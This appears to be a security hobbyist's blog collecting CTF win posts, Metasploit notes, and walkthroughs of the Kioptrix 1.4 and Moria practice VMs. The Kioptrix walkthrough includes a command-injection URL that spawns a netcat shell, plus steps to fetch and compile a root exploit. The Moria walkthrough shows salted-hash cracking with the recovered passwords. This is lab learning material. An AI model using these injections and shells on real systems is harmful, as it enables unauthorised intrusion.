Captured The Flag

Along with my friend eth3real (and some pitching in from our new friend Brian), we teamed up as DefCon828 and won the Capture the Flag contest at BSides Asheville today. The loot was some cool WiFi Pineapple gear.

Last month, Jess and I won 1st and 2nd place respectively at BlueRidgeCon. I do feel bad about missing out on the lectures, talks, and socialization at these awesome conferences, but I can’t stay away from the CTFs. It’s bad.

BSides Asheville – 2nd Place CTF

I attended BSides Asheville today, the “other” hacker conference for IT security folks. This was Asheville’s fourth such conference (they happen in cities all over the world), and it was my first chance to go to one.

I wasn’t disappointed. I ended up spending most of my time in the “Lockpick Village” and working on the Capture The Flag competition.

The Lockpick Village was a challenge, even for someone who used to be a professional locksmith. It turns out that working under the pressure of an 8-minute timer, with people surrounding you to jeer and cheer you on does not make it easy to operate.

I was able to get out of the handcuffs rather quickly (about 1 minute), and then I picked the first lock relatively soon therafter (2 minute mark). However, my crucial mistake was that I picked it in the wrong direction, so I had to start over, and it took me much longer.

By the time I made it to the second lock, I only had about 2 minutes left, and it proved to be too much for me to conquer. It didn’t help that I’m used to using rake picks on pin tumbler locks, and they didn’t have any for me to use.

I ventured into the Capture The Flag contest after that, where I was able to put into practice all of the penetration testing skills I’ve been working diligently on since January. The Penetration Testing with Kali Linux course I’m enrolled in helped too.

I was the first person to root a Windows 2008 server and gain enough points on other servers to get into the top-three.

This turned out to be a positive affirmation that my hard work has paid off, as I took home the Second Place prize, a brand new Raspberry Pi 3 with the Canakit add-ons.

Granted, the first place winner forfeited and the team ahead of me was three professionals working together. Still, I took 2nd place after all that, and it was my first CTF.

The BSides team and volunteers put on a great day of fun. I am already looking forward to next year’s conference.

Metasploit Tidbits

I’ve been working through Metasploit Unleashed in preparation for the PWK course and the ensuing OSCP exam. Looks like I’ll be signing up for that in early July. While you can’t use Metasploit on the OSCP exam, they do teach it in the PWK course itself, and it’s a very powerful tool anyway, so learning it now seemed like a good idea.

I’ve been taking a lot of notes in OneNote as I progress on all things OSCP, but I thought I’d share some of the handier Metasploit tricks that I might find myself using from day to day. Additionally, writing all this out and thinking about it as I do so helps me commit it to memory, so this blog post isn’t an entirely selfless effort ūüėČ

Find Hosts on Your Network

The arp_sweep auxiliary module comes in handy to find hosts on your network. In the below example, you select the arp_sweep tool, show its options, then set the RHOSTS variable accordingly for you your network range.

Running the above will return some output that looks something like this:

If you want to be sneaky when you do this (and why would you need to be sneaky on your home network? ūüėČ ) you can spoof the source host (you) and the source MAC address so that it doesn’t look like you have been scanning anything. Typically, you might set this to appear to be coming from your router.

Scan a Host

Metasploit lets you scan hosts that you discover.

You can set THREADS (10) and CONCURRENCY (20) too, to help speed things up without getting too crazy.

You can even use nmap from within Metasploit, and store the results in the database, or import normal nmap results (saved as xml) into the Metasploit database. The advantage of doing this is that you can save your work and results in workspaces in Metasploit. Workspaces let you create projects and keep things organized, which is useful when working on many targets, or with a team.

I will provide some examples of this soon. Stay tuned. For now, here’s what looks like a great reference for this.

 

Kioptrix 1.4 (VM 5) Walkthrough

This evening I am finally catching up on write-ups of the Virtual Machine penetration testing (and subsequent pwnage) I have been working on. This is the second one I finished up and got ready to share, in case anyone finds it useful. The Kioptrix series of VMs are available on vulnhub.com, and you can download them to practice your hacking skills with at any time, for free.

Having already conquered the preceding 4 Kioptrix VMs, I started this one a while ago, but I hadn’t circled back to finish it. I figured it was time to complete the last of the Kioptrix boot2root challenges. This one was difficult!

Enumeration

netdiscover turned up 192.168.0.196 as the IP for this target VM.

On port 80, just a default Apache “It works!” message, and 8080 is a forbidden 403 message.¬†Worth noting that for later.

nikto

Summary of Interesting finds:
OpenSSL exploit
Older Apache
Older PHP

Finding Directories

dirb

Turned up index.html (nothing new) and cgi-bin. Blah.

dirsearch

Tried various wordlists. Nothing turned up with this either.

mod_ssl vulnerability

Nikto did mention this vulnerability, so I took a deeper dive:

This is that same old OpenFuck vuln I ran into in Kioptrix 1.1. I was unable to get it to compile then, so I didn’t feel like wasting time on it now.

Source Code to a PHP app

Failing to ever look at the source code of the Apache “It Works!” default page, I kicked myself when I realized I hadn’t done that. In the source code was a handy comment:

<!–
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>
–>

Appending pChart2.1.3/index.php to the URL got me to some crappy PHP app:

http://192.168.0.196/pChart2.1.3/examples/index.php

The app looks like it would have a load of issues based on what it does and how it does it. An Exploit DB search reveals it does:

https://www.exploit-db.com/exploits/31173/

Directory Traversal sounds useful!

Using the exploit at Exploit DB, I found /etc/passwd:

Poking Around

I was unable to turn up anything useful in any of the /etc directory files I was able to look at. I started looking up the locations of things in freebsd, since they were likely different than most Linux distros I am used to.

That said, I thought that the Apache config file would be a good place to start, as it might illumincate additional info such as usernames, or locations of password files. I might also find out if anything else is hidden on the website.

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:
/usr/local/etc/apache2x/httpd.conf

I had to figure out that the x in that path should be a 2, since this server is running Apache 2.2

So that worked:

So what was relevant in the httpd.conf file?

Listen 80
Listen 8080

I already knew 80 was listening, and 8080 was reported as open but returning a 403 when trying to visit it in a web browser.

DocumentRoot “/usr/local/www/apache22/data”

That’s where files are served from in Apache on freebsd, apparently.

This VirtualHost section looked interesting, as it explained the 403 errors I was getting when visiting the :8080 port
:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

So the :8080 virtual host is guarded by requiring a specific browser User-Agent string. Time to install User Agent Switcher add-on for Firefox. I prefer the one by Chris Pederick.

A Mozilla 4.0 browser is actually Internet Explorer 6, so I set my User Agent to be IE6, then I was able to get to the :8080 page:

Clicking that led me to yet another crappy PHP app!

Attacking the PHPTAX app

This app smelled like it was choc-full of fun exploits. A quick Google search revealed exactly that.

https://www.exploit-db.com/exploits/21665/

This will start a netcat reverse shell by injecting the command via the URL:

http://192.168.0.196/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Trying to set up a netcat listener using various methods wasn’t working. I tried various ports and different things from the exploit-db entry (the other URL they mentioned), but had no luck.

Was there already an exploit in Metasploit?

That would be a “yes.”¬†I thought doing it by hand would be more noble and educational, but alas, that proved to be untrue. Except that I learned I was down a rabbit hole. Off to metasploit I went…

That worked pretty well, and I found myself with a command shell.

Looks like I was the www user/group. I set out to escalate them privileges. Looking around for quite some time, I didn’t find anything too great. So I started with looking into OS/Kernel vulnerabilities.

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

FreeBSD 9.0 seemed pretty old. A couple of promising leads turned up when looking for exploits:

Privilege Escalation

So I had 2 exploits to work with, just needed a place I could write files. Turns out the original web directory I was in when I got the reverse shell was perfect:

/usr/local/www/apache22/data2/phptax

touch me
cat me

Next, I needed to get the exploit file over to the target machine. I wasn’t sure how to do this, so I Googled it. This helped: https://netsec.ws/?p=292. Or so I thought. I couldn’t get it transferred with netcat and I’m still not sure why.

More Googling led me to ‘fetch’ which is installed on the FreeBSD machine.

So I set up a quick web server to serve up the exploit file from my Kali box using Python. From the directory where the exploit file (26368.c) resides:

python -m SimpleHTTPServer 80

Then from the reverse shell on the target machine, fetch the file:

fetch http://192.168.0.147/26368.c

Compile that sucker:

gcc 26368.c

Then run it:

./a.out

ROOT!

And the flag is in /root/congrats.txt

You should read the congrats.txt file and look into what it says, if you made it this far. There are some opportunities to learn about what you just did in there!

Moria: A Boot2Root VM Walkthrough

Moria is a relatively new¬†boot2root VM created by Abatchy, and is considered an “intermediate to hard” level challenge. I wasn’t sure I was up for it since I’ve only been doing this for a few months, but much to my delight I conquered this VM and learned a lot in the process. This experience will certainly help as I prepare for the OSCP certification.

While Abatchy says, “No LOTR knowledge is required ;),” I found that my LOTR knowledge came in quite handy.

Getting Started

My setup:

  • MacBook running MacOS (Sierra)
  • VMWare Fusion running:
  • Kali Linux (latest)
  • Moria VM

Once the VM was downloaded and running in VMWare, I started through various enumeration techniques that I typically go through when starting to penetration test a box. I’ll omit the irrelevant ones in this write-up.

Enumeration

Netdiscover

This tool revealed the IP of this machine on my network:

192.168.0.131

nmap

I used nmap -v -sS -A -T4 192.168.0.131
and nmap ‚ÄďsS ‚ÄďsV -O 192.168.0.131

PORT STATE SERVICE
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:E8:75:4F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X

So HTTP, FTP, and SSH were running. I started by checking out HTTP and visiting¬†http://192.168.0.131 in a web browser. Here’s what I got:

The image of the West Door of Moria is from LOTR. This door was a trick door in the book and movies, and it required some “outside the box” thinking in order to gain entry. I remembered this from the books, and re-familiarized myself with the details via a Google search:

From http://tolkiengateway.net/wiki/Doors_of_Durin:

“On¬†13 January¬†3019¬†the¬†Fellowship of the Ring¬†entered Moria through the Doors,[5]¬†but initially Gandalf could not find out the password to open them.¬†Merry Brandybuck¬†unknowingly gave Gandalf the answer by asking, “What does it mean by¬†speak, friend, and enter?” When Gandalf realized that the correct translation was “Say friend and enter” he sprang up, laughed, and said “Mellon”, which means “friend” in¬†Sindarin, and the Doors opened. Shortly thereafter, the¬†Watcher in the Water¬†attacked the Fellowship and shut the Doors behind them.[1]”

Good info that might come in handy later ūüėČ

dirb

Running dirb led to the discovery of a directory at http://192.168.0.131/w/. It contained a link to /h/, and so on. Traversing down the links led to:

http://192.168.0.131/w/h/i/s/p/e/r/the_abyss/


The page said “Knock knock”
Was this a reference to port knocking? I thought that might be worth checking out later if I could find more info about a sequence.

At this time I was unable to find much more to work with related to the website and HTTP. The usual nikto and other apache/web-related stuff didn’t turn much up. I turned to FTP.

ftp

Trying to connect via FTP turned up some interesting info:

220 Welcome Balrog!

Clearly, the Lord of the Rings theme was running deep. I wondered if the password would be “mellon,” since that was what got the LOTR party into the gates of Moria. I couldn’t get that to work, and I wasn’t sure about a username.

Revisiting the website

Poking around the website some more, I DISCOVERED SOMETHING IMPORTANT!!!
When I browsed to http://192.168.0.131/w/h/i/s/p/e/r/the_abyss/
It gave me something different the next time. I found that a different quote would appear with each page load. I kept refreshing and collected all of the following:

Knock Knock
Is this the end?
Too loud!
Dain:”Is that human deaf? Why is it not listening?”
Nain:”Will the human get the message?”
Is this the end?
“We will die here..”
Ori:”Will anyone hear us?”
Nain:”Will the human get the message?”
Telchar to Thrain:”That human is slow, don’t give up yet”
Maeglin:”The Balrog is not around, hurry!”
Balin: “Be quiet, the Balrog will hear you!”
Oin:”Stop knocking!”
“Eru! Save us!”

A couple of weeks passed at this point, as I went out of town and had other things going on, but it gave me an opportunity to think about Moria and to come back with a fresh perspective.

ssh

Tried a bunch of other things, but finally tried doing SSH to the server and was prompted for a login.
Based on the FTP connection saying “Welcome Balrog!” I assumed that Balrog was a username. I also assumed that Mellon was the password knowing what I know about the LOTR story. Lastly, I realized I probably needed to try various capitalizations.

Using the login combo of Balrog / Mellon I got this:

 

Wrong gate? OK. I went back to try FTP with the Balrog/Mellon auth combo and got in:

Silly me. The username was right there in front of me when I had been trying FTP before. Nothing in the directory I logged into turned up, but I was able to cd .. up to /

I could go many places with basic dir navigation, but much was not allowed. For example, could get into /etc but not look at passwd. I couldn’t find anywhere that I could upload anything, and none of the important system files you’d typically check were allowed to be viewed.

I went to /var/www/html and found a directory that dirb would never have discovered:

Viewing that page in my web browser showed a handy table of what appeared to be hashes:

Hashes

I set off to see what those passkeys could do. They did’t seem to work as-is for SSH or FTP, so I knew they’d need to be operated on somehow.

hash-identifier said they were likely MD5 hashes:

Without a salt I wasn’t sure how I’d use that information.

I tried various things with Hashcat and John the Ripper, but had no luck. I was stumped for a while until I looked under the hood at the source code of that page at http://192.168.0.131/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/

Note: Looking at the HTML source code is something I always forget to do, and it has bitten me more than once!

At the bottom of the source code I found what appeared to be the salts:

 

So I had the salts for those MD5 hashes, and I had what looked like the format for using them:

MD5(MD5(Password).Salt)

Cracking

This next part took me a lot of reading and learning, as I’d never really run into this before in my rather limited experience, and I had only a basic knowledge of Hashcat and John the Ripper. While it took some time, it turned out to be a great opportunity to learn.

Ultimately, based on what I had read in various seedy places of the Internet’s underbelly, I created a file called hashes.txt with these contents, based on the HTML chart found above, and added the salts to each line (after the $) respectively:

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

I still needed to figure out the right format for running through John the Ripper though, so more research was needed. I turned to these places:

http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats – not much help here.
https://github.com/piyushcse29/john-the-ripper/blob/master/doc/DYNAMIC – found the solution here.

Based on the chart on the documentation page for DYNAMIC, the format mentioned in the source code would work with this:

dynamic_6 | md5(md5($p).$s)

I next tried that on the hashes.txt file:

root@kali:~/moria# john –format=dynamic_6 hashes.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4×3])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
magic (Telchar)
abcdef (Dain)
spanky (Ori)
fuckoff (Maeglin)
flower (Balin)
rainbow (Oin)
darkness (Thrain)
hunter2 (Fundin)

SUCCESS!

I had a list of passwords for each user. Only one of these worked for logging in via SSH, and that was Ori’s account.

Bash Shell Obtained

Got a Bash shell with Ori’s login via SSH:

-bash-4.2$

-bash-4.2$ ls -al
total 8
drwx—— 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x—. 4 root notBalrog 32 Mar 14 00:36 ..
-rw——- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
-rw-r–r– 1 root root 225 Mar 13 23:53 poem.txt
drwx—— 2 Ori notBalrog 57 Mar 12 22:57 .ssh

Starting in Ori’s home directory, I¬†checked out the .ssh directory to see what might be relevant.

It looked like Ori had logged into localhost before, since it showed up as a known_host. Why would he be doing that unless he needed to log in as someone else? Perhaps as root?

root Obtained – All That is Gold Does Not Glitter

Huh…well that last part was easier than I thought it might be. Thanks to Abatchy for providing this challenge. I learned a lot!